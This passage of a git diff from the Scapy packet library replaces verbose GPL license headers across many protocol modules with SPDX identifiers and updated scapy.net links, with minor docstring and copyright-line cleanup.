Control Protocol (SCCP) # scapy.contrib.status = loads - -############################################################################# -# # -# scapy-skinny.py --- Skinny Call Control Protocol (SCCP) extension # -# # -# Copyright (C) 2006 Nicolas Bareil # -# EADS/CRC security team # -# # -# This file is part of Scapy # -# Scapy is free software: you can redistribute it and/or modify # -# under the terms of the GNU General Public License version 2 as # -# published by the Free Software Foundation; version 2. # -# # -# This program is distributed in the hope that it will be useful, but # -# WITHOUT ANY WARRANTY; without even the implied warranty of # -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # -# General Public License for more details. # -# # -############################################################################# +""" +Skinny Call Control Protocol (SCCP) extension +""" from __future__ import absolute_import import time diff --git a/scapy/contrib/slowprot.py b/scapy/contrib/slowprot.py index 56835ac2dd1..4a1785871fc 100644 --- a/scapy/contrib/slowprot.py +++ b/scapy/contrib/slowprot.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Slow Protocol # scapy.contrib.status = loads diff --git a/scapy/contrib/socks.py b/scapy/contrib/socks.py index d4ec6b23b18..182e1aff0c3 100644 --- a/scapy/contrib/socks.py +++ b/scapy/contrib/socks.py @@ -1,7 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information # scapy.contrib.description = Socket Secure (SOCKS) # scapy.contrib.status = loads diff --git a/scapy/contrib/spbm.py b/scapy/contrib/spbm.py index 119d757f134..fae33866c7b 100644 --- a/scapy/contrib/spbm.py +++ b/scapy/contrib/spbm.py @@ -1,39 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - -# IEEE 802.1aq - Shorest Path Bridging Mac-in-mac (SPBM): -# Ethernet based link state protocol that enables Layer 2 Unicast, Layer 2 Multicast, Layer 3 Unicast, and Layer 3 Multicast virtualized services # noqa: E501 -# https://en.wikipedia.org/wiki/IEEE_802.1aq -# Modeled after the scapy VXLAN contribution +# See https://scapy.net/ for more information # scapy.contrib.description = Shorest Path Bridging Mac-in-mac (SBPM) # scapy.contrib.status = loads """ - Example SPB Frame Creation +IEEE 802.1aq - Shorest Path Bridging Mac-in-mac (SPBM): - Note the outer Dot1Q Ethertype marking (0x88e7) +Ethernet based link state protocol that enables +- Layer 2 Unicast +- Layer 2 Multicast +- Layer 3 Unicast +- Layer 3 Multicast virtualized services - backboneEther = Ether(dst='00:bb:00:00:90:00', src='00:bb:00:00:40:00', type=0x8100) # noqa: E501 - backboneDot1Q = Dot1Q(vlan=4051,type=0x88e7) - backboneServiceID = SPBM(prio=1,isid=20011) - customerEther = Ether(dst='00:1b:4f:5e:ca:00',src='00:00:00:00:00:01',type=0x8100) # noqa: E501 - customerDot1Q = Dot1Q(prio=1,vlan=11,type=0x0800) - customerIP = IP(src='10.100.11.10',dst='10.100.12.10',id=0x0629,len=106) # noqa: E501 - customerUDP = UDP(sport=1024,dport=1025,chksum=0,len=86) +https://en.wikipedia.org/wiki/IEEE_802.1aq +Modeled after the scapy VXLAN contribution - spb_example = backboneEther/backboneDot1Q/backboneServiceID/customerEther/customerDot1Q/customerIP/customerUDP/"Payload" # noqa: E501 +Example SPB Frame Creation +__________________________ + +Note the outer Dot1Q Ethertype marking (0x88e7) + +:: + backboneEther = Ether(dst='00:bb:00:00:90:00', src='00:bb:00:00:40:00', type=0x8100) # noqa: E501 + backboneDot1Q = Dot1Q(vlan=4051,type=0x88e7) + backboneServiceID = SPBM(prio=1,isid=20011) + customerEther = Ether(dst='00:1b:4f:5e:ca:00',src='00:00:00:00:00:01',type=0x8100) # noqa: E501 + customerDot1Q = Dot1Q(prio=1,vlan=11,type=0x0800) + customerIP = IP(src='10.100.11.10',dst='10.100.12.10',id=0x0629,len=106) # noqa: E501 + customerUDP = UDP(sport=1024,dport=1025,chksum=0,len=86) + + spb_example = backboneEther/backboneDot1Q/backboneServiceID/customerEther/customerDot1Q/customerIP/customerUDP/"Payload" # noqa: E501 """ from scapy.packet import Packet, bind_layers diff --git a/scapy/contrib/tacacs.py b/scapy/contrib/tacacs.py index a285aef4ecc..ed1ca0640be 100755 --- a/scapy/contrib/tacacs.py +++ b/scapy/contrib/tacacs.py @@ -1,20 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Copyright (C) 2017 Francois Contat -# Based on tacacs+ v6 draft https://tools.ietf.org/html/draft-ietf-opsawg-tacacs-06 # noqa: E501 +""" +TACACS + +Based on tacacs+ v6 draft +https://tools.ietf.org/html/draft-ietf-opsawg-tacacs-06 +""" # scapy.contrib.description = Terminal Access Controller Access-Control System+ # scapy.contrib.status = loads diff --git a/scapy/contrib/tcpao.py b/scapy/contrib/tcpao.py index d7763e293a1..406bf5b5145 100644 --- a/scapy/contrib/tcpao.py +++ b/scapy/contrib/tcpao.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Leonard Crestez -# This program is published under a GPLv2 license # scapy.contrib.description = TCP-AO Signature Calculation # scapy.contrib.status = loads diff --git a/scapy/contrib/tzsp.py b/scapy/contrib/tzsp.py index 5964362bda3..29206e3616f 100644 --- a/scapy/contrib/tzsp.py +++ b/scapy/contrib/tzsp.py @@ -1,3 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information + # scapy.contrib.description = TaZmen Sniffer Protocol (TZSP) # scapy.contrib.status = loads @@ -6,17 +10,6 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :author: Thomas Tannhaeuser, hecke@naberius.de - :license: GPLv2 - - This module is free software; you can redistribute it and/or - modify it under the terms of the GNU General Public License - as published by the Free Software Foundation; either version 2 - of the License, or (at your option) any later version. - - This module is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. :description: diff --git a/scapy/contrib/ubberlogger.py b/scapy/contrib/ubberlogger.py index 92721d13712..3fd509ae748 100644 --- a/scapy/contrib/ubberlogger.py +++ b/scapy/contrib/ubberlogger.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # Author: Sylvain SARMEJEANNE diff --git a/scapy/contrib/vqp.py b/scapy/contrib/vqp.py index 5d4476fb731..f1add3f83c6 100644 --- a/scapy/contrib/vqp.py +++ b/scapy/contrib/vqp.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = VLAN Query Protocol # scapy.contrib.status = loads diff --git a/scapy/contrib/vtp.py b/scapy/contrib/vtp.py index 8ae85709ce7..fa53d490783 100644 --- a/scapy/contrib/vtp.py +++ b/scapy/contrib/vtp.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = VLAN Trunking Protocol (VTP) # scapy.contrib.status = loads diff --git a/scapy/contrib/wireguard.py b/scapy/contrib/wireguard.py index 2263d00095b..0e7e0b1cea9 100644 --- a/scapy/contrib/wireguard.py +++ b/scapy/contrib/wireguard.py @@ -1,17 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # scapy.contrib.description = WireGuard # scapy.contrib.status = loads diff --git a/scapy/contrib/wpa_eapol.py b/scapy/contrib/wpa_eapol.py index 388ca77f7c0..77853d12c7e 100644 --- a/scapy/contrib/wpa_eapol.py +++ b/scapy/contrib/wpa_eapol.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = WPA EAPOL-KEY # scapy.contrib.status = loads diff --git a/scapy/dadict.py b/scapy/dadict.py index 80b2b61f4bd..f233dad5364 100644 --- a/scapy/dadict.py +++ b/scapy/dadict.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Direct Access dictionary. diff --git a/scapy/data.py b/scapy/data.py index f9657bc23b6..f58efbea9a8 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Global variables and functions for handling external data sets. diff --git a/scapy/error.py b/scapy/error.py index 95922b19207..e846b86bc40 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Logging subsystem and basic exception class. diff --git a/scapy/fields.py b/scapy/fields.py index adade3b9c69..ca09da317c3 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1,9 +1,9 @@ -# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*- +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi # Copyright (C) Michael Farrell -# This program is published under a GPLv2 license + """ Fields: basic data structures that make up parts of packets. diff --git a/scapy/interfaces.py b/scapy/interfaces.py index e770b4f6590..0afc9d7fe2d 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -1,8 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """ Interfaces management diff --git a/scapy/layers/__init__.py b/scapy/layers/__init__.py index 326b77a23e3..79156832c8e 100644 --- a/scapy/layers/__init__.py +++ b/scapy/layers/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Layer package. diff --git a/scapy/layers/all.py b/scapy/layers/all.py index 54795f4bdb0..ad6e4d0c6ae 100644 --- a/scapy/layers/all.py +++ b/scapy/layers/all.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ All layers. Configurable with conf.load_layers. diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 4d44bb27d3a..51a13e9ee65 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1,9 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi # Copyright (C) Mike Ryan # Copyright (C) Michael Farrell -# This program is published under a GPLv2 license """ Bluetooth layers, sockets and send/receive functions. diff --git a/scapy/layers/bluetooth4LE.py b/scapy/layers/bluetooth4LE.py index a99848cb6de..6d351c03607 100644 --- a/scapy/layers/bluetooth4LE.py +++ b/scapy/layers/bluetooth4LE.py @@ -1,8 +1,9 @@ -# This file is for use with Scapy -# See http://www.secdev.org/projects/scapy for more information +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Philippe Biondi # Copyright (C) Airbus DS CyberSecurity # Authors: Jean-Michel Picod, Arnaud Lebrun, Jonathan Christofer Demay -# This program is published under a GPLv2 license """Bluetooth 4LE layer""" diff --git a/scapy/layers/can.py b/scapy/layers/can.py index c801ef1a73a..1110826dea1 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """A minimal implementation of the CANopen protocol, based on diff --git a/scapy/layers/clns.py b/scapy/layers/clns.py index 5ffbd86f638..e9121adb2a5 100644 --- a/scapy/layers/clns.py +++ b/scapy/layers/clns.py @@ -1,20 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2014, 2015 BENOCS GmbH, Berlin (Germany) + """ CLNS Extension ~~~~~~~~~~~~~~~~~~~~~ :copyright: 2014, 2015 BENOCS GmbH, Berlin (Germany) :author: Marcel Patzlaff, mpatzlaff@benocs.com - :license: GPLv2 - - This module is free software; you can redistribute it and/or - modify it under the terms of the GNU General Public License - as published by the Free Software Foundation; either version 2 - of the License, or (at your option) any later version. - - This module is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. :description: diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index d666f4acc03..c93eb38c3d4 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -1,17 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Copyright (C) 2016 Gauthier Sebaux # 2022 Gabriel Potter diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 62fbc6ced54..44ec26e7614 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ DHCP (Dynamic Host Configuration Protocol) and BOOTP diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 41ade9a32ed..9adee25b2c2 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information +# Copyright (C) Philippe Biondi # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license - # Copyright (C) 2005 Guillaume Valadon # Arnaud Ebalard diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 757836c5530..3ecb80936a8 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ DNS: Domain Name System. diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 068163557a4..924fcd8f294 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1,18 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi """ diff --git a/scapy/layers/dot15d4.py b/scapy/layers/dot15d4.py index 9412c9dfea9..5854abff1a3 100644 --- a/scapy/layers/dot15d4.py +++ b/scapy/layers/dot15d4.py @@ -1,11 +1,11 @@ -# This program is published under a GPLv2 license +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information +# Copyright (C) Philippe Biondi # Copyright (C) Ryan Speers 2011-2012 # Copyright (C) Roger Meyer : 2012-03-10 Added frames -# Copyright (C) Gabriel Potter : 2018 -# Copyright (C) 2020 Dimitrios-Georgios Akestoridis -# This program is published under a GPLv2 license +# Copyright (C) Gabriel Potter : 2018 +# Copyright (C) Dimitrios-Georgios Akestoridis """ Wireless MAC according to IEEE 802.15.4. diff --git a/scapy/layers/eap.py b/scapy/layers/eap.py index 4896c7656cf..bb59a9a81a3 100644 --- a/scapy/layers/eap.py +++ b/scapy/layers/eap.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Extensible Authentication Protocol (EAP) diff --git a/scapy/layers/gprs.py b/scapy/layers/gprs.py index 8a35efae5c6..b994cf7ac52 100644 --- a/scapy/layers/gprs.py +++ b/scapy/layers/gprs.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ GPRS (General Packet Radio Service) for mobile data communication. diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 927fadc6fe6..cdee4b31bc7 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """ Generic Security Services (GSS) API diff --git a/scapy/layers/hsrp.py b/scapy/layers/hsrp.py index 791a1cfeff8..ca0868f927e 100644 --- a/scapy/layers/hsrp.py +++ b/scapy/layers/hsrp.py @@ -1,35 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license - -############################################################################# -# # -# hsrp.py --- HSRP protocol support for Scapy # -# # -# Copyright (C) 2010 Mathieu RENARD mathieu.renard(at)gmail.com # -# # -# This program is free software; you can redistribute it and/or modify it # -# under the terms of the GNU General Public License version 2 as # -# published by the Free Software Foundation; version 2. # -# # -# This program is distributed in the hope that it will be useful, but # -# WITHOUT ANY WARRANTY; without even the implied warranty of # -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # -# General Public License for more details. # -# # -############################################################################# -# HSRP Version 1 -# Ref. RFC 2281 -# HSRP Version 2 -# Ref. http://www.smartnetworks.jp/2006/02/hsrp_8_hsrp_version_2.html -## -# $Log: hsrp.py,v $ -# Revision 0.2 2011/05/01 15:23:34 mrenard -# Cleanup code +# See https://scapy.net/ for more information +# Copyright (C) Mathieu RENARD """ -HSRP (Hot Standby Router Protocol): proprietary redundancy protocol for Cisco routers. # noqa: E501 +HSRP (Hot Standby Router Protocol) +A proprietary redundancy protocol for Cisco routers. + +- HSRP Version 1: RFC 2281 +- HSRP Version 2: + http://www.smartnetworks.jp/2006/02/hsrp_8_hsrp_version_2.html """ from scapy.fields import ByteEnumField, ByteField, IPField, SourceIPField, \ diff --git a/scapy/layers/http.py b/scapy/layers/http.py index f6517b506f0..e2507daa039 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -1,10 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) 2019 Gabriel Potter +# See https://scapy.net/ for more information # Copyright (C) 2012 Luca Invernizzi # Copyright (C) 2012 Steeve Barbeau - -# This program is published under a GPLv2 license +# Copyright (C) 2019 Gabriel Potter """ HTTP 1.0 layer. @@ -39,7 +38,6 @@ # This file is a modified version of the former scapy_http plugin. # It was reimplemented for scapy 2.4.3+ using sessions, stream handling. # Original Authors : Steeve Barbeau, Luca Invernizzi -# Originally published under a GPLv2 license import io import os diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index d1a4588ed9a..5251b38202b 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ IPv4 (Internet Protocol v4). diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index eb5a50e8dfd..ba8e382b65b 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1,22 +1,11 @@ -############################################################################# -# # -# inet6.py --- IPv6 support for Scapy # -# see http://natisbad.org/IPv6/ # -# for more information # -# # -# Copyright (C) 2005 Guillaume Valadon # -# Arnaud Ebalard # -# # -# This program is free software; you can redistribute it and/or modify it # -# under the terms of the GNU General Public License version 2 as # -# published by the Free Software Foundation. # -# # -# This program is distributed in the hope that it will be useful, but # -# WITHOUT ANY WARRANTY; without even the implied warranty of # -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # -# General Public License for more details. # -# # -############################################################################# +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Guillaume Valadon +# Copyright (C) Arnaud Ebalard + +# Cool history about this file: http://natisbad.org/scapy/index.html + """ IPv6 (Internet Protocol v6). diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 7d292ad422f..162d5aa971a 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -1,17 +1,8 @@ -############################################################################# -# ipsec.py --- IPsec support for Scapy # -# # -# Copyright (C) 2014 6WIND # -# # -# This program is free software; you can redistribute it and/or modify it # -# under the terms of the GNU General Public License version 2 as # -# published by the Free Software Foundation. # -# # -# This program is distributed in the hope that it will be useful, but # -# WITHOUT ANY WARRANTY; without even the implied warranty of # -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # -# General Public License for more details. # -############################################################################# +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2014 6WIND + r""" IPsec layer =========== diff --git a/scapy/layers/ir.py b/scapy/layers/ir.py index f8b77b46a2a..0206808ddc2 100644 --- a/scapy/layers/ir.py +++ b/scapy/layers/ir.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ IrDA infrared data communication. diff --git a/scapy/layers/isakmp.py b/scapy/layers/isakmp.py index 4267e22b9b7..d2f4e36d5ef 100644 --- a/scapy/layers/isakmp.py +++ b/scapy/layers/isakmp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ ISAKMP (Internet Security Association and Key Management Protocol). diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 04c1819ac9d..31717529f91 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Classes and functions for layer 2 protocols. diff --git a/scapy/layers/l2tp.py b/scapy/layers/l2tp.py index 3480f5ebd6d..45e8d1c907f 100644 --- a/scapy/layers/l2tp.py +++ b/scapy/layers/l2tp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ L2TP (Layer 2 Tunneling Protocol) for VPNs. diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 42326778462..40c542c0c52 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license """ LDAP diff --git a/scapy/layers/llmnr.py b/scapy/layers/llmnr.py index c2bb3e58bd3..4f32b114299 100644 --- a/scapy/layers/llmnr.py +++ b/scapy/layers/llmnr.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ LLMNR (Link Local Multicast Node Resolution). diff --git a/scapy/layers/lltd.py b/scapy/layers/lltd.py index 1cda828530b..8a374f9aabb 100644 --- a/scapy/layers/lltd.py +++ b/scapy/layers/lltd.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """LLTD 